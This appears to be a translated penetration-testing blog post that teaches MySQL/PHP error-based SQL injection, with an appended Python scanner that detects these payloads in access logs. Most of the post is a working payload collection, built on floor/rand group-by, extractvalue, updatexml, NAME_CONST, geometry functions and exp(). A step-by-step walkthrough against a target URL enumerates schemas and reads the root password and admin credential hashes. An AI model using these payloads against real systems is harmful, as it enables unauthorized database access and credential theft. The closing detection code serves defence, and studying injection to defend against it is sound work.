
Web Security, SQL Injection: MySQL + PHP Error-Based Injection

Author: 血梦  Date: 2020-03-18  Views: 118  Category: Penetration Testing

When MySQL executes a SQL statement that contains an error, it returns an error message. When MySQL is used together with PHP, that error message is not shown on the page by default.

For PHP to show it, the statement has to be executed with mysql_error() attached, which sends the error text to the page:

$result=mysql_query("select * from article where id=$id") or die(mysql_error());


1. Detecting injection

and 1=1
and 1=2

2. Dumping the database name

id=info() returns the name of the current database:

FUNCTION target_sys.info does not exist

target_sys is the name of the current database.


3. Some error-producing statements

1. Errors via floor
/* database version */
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* quick way to get the database name */
id=info()
/* connected user */
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* current database */
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump databases */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump tables */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump columns */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/* dump contents */
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2. ExtractValue (length limit: at most 32 characters)
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
3. UpdateXml (length limit: at most 32 characters)
and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
4. NAME_CONST (works on older MySQL versions)
and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
5. Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)
/* database version */
or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

Some more error-producing statements

1. floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2. extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3. updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4. geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5. multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6. polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7. multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8. linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9. multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10. exp()

select * from test where id=1 and exp(~(select * from(select user())a));

4. Error-based injection in practice

Current user name

http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

root password

http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select password from mysql.user),0x7e)))

Query the databases

http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Query the second database

http://target_sys.com/mysqlinj.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Keep pushing the 1 in the FROM information_schema.schemata LIMIT 1,1 part forward and you obtain every database name:

target_sys

Query the tables

http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Second table

http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Query the columns

To query the columns of the admin table, first convert admin to hexadecimal and put that into the statement:

http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Query the second column: push the 0 in 0x61646D696E LIMIT 0,1 forward

http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Query the data

http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Querying data with updatexml

http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

This kind of query returns at most 32 characters, so part of the result is cut off. You can query the ciphertext (the stored hash) first, or first query the length and then extract the string piece by piece by character position.

http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct LENGTH(concat(0x23,username,0x3a,password,0x23)) FROM admin limit 0,1),0x7e),1)

The LENGTH function reports a length of 40.

SUBSTRING() is the string extraction function.

Query characters 1-32

http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct SUBSTRING(concat(0x23,username,0x3a,password,0x23),1,32) FROM admin limit 0,1),0x7e),1)

admin:e10adc3949ba59abbe56e057

Query characters 32-40

http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct SUBSTRING(concat(0x23,username,0x3a,password,0x23),33,40) FROM admin limit 0,1),0x7e),1)

f20f883e

Combined: admin:e10adc3949ba59abbe56e057f20f883e
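As an added example (not code from the original post), here is a small Python scanner for the defending side: it flags the error-based payload families listed above (floor/rand group by, extractvalue, updatexml, NAME_CONST, the geometry functions, exp(~...), info()) in web server access logs, and recognises the MySQL error text that a page echoing mysql_error() would leak in its responses. The log lines, client addresses and the file name mysqlinj.php are constructed for the example.

```python
import re
from urllib.parse import unquote_plus
# One signature per error-based technique family discussed in this post.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)[\s\S]*group\s+by", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "geometry_func": re.compile(
        r"\b(?:geometrycollection|multipoint|polygon|multipolygon|linestring|multilinestring)\s*\(\s*\(\s*select\b", re.I),
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "info_func": re.compile(r"=\s*info\s*\(\s*\)", re.I),
}
# Raw MySQL error text that an application printing mysql_error() leaks to the client.
LEAKED_ERROR = re.compile(r"XPATH syntax error|Duplicate entry '.*' for key 'group_key'|FUNCTION \S+ does not exist"
                          r"|Illegal non geometric|DOUBLE value is out of range", re.I)
# Apache/nginx combined log format: client ip, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def normalize(text):
    """Percent/plus-decode a few times so double-encoded payloads stay visible; drop /**/ fillers."""
    for _ in range(3):
        text = unquote_plus(text)
    return text.replace("/**/", " ")

def classify_request(url):
    """Return the technique families whose signature appears in the decoded URL."""
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(normalize(url))]

def leaks_mysql_error(body):
    """True if a response body carries raw MySQL error text (mysql_error() output)."""
    return bool(LEAKED_ERROR.search(body))

def scan_log(lines):
    """Return (client_ip, status, families) for every logged request matching a signature."""
    matches = (LOG_RE.match(line) for line in lines)
    return [(m.group("ip"), m.group("status"), fam) for m in matches
            if m and (fam := classify_request(m.group("url")))]

# Constructed sample log lines (not real traffic); the payload shapes mirror the post above.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Mar/2020:10:00:01 +0800] "GET /mysqlinj.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [18/Mar/2020:10:00:02 +0800] "GET /mysqlinj.php?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))) HTTP/1.1" 200 640',
    '203.0.113.5 - - [18/Mar/2020:10:00:03 +0800] "GET /mysqlinj.php?id=-1%20and(select%201%20from(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 655',
    '203.0.113.5 - - [18/Mar/2020:10:00:04 +0800] "GET /mysqlinj.php?id=info() HTTP/1.1" 200 598',
    '198.51.100.9 - - [18/Mar/2020:10:00:05 +0800] "GET /mysqlinj.php?id=1+and+exp(~(select*from(select+user())a)) HTTP/1.1" 500 210',
]
```

Run scan_log(SAMPLE_LOG) to get one hit per injected request; the benign first line produces none. Pair it with leaks_mysql_error() on response bodies to catch the application-side mistake of echoing database errors at all.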

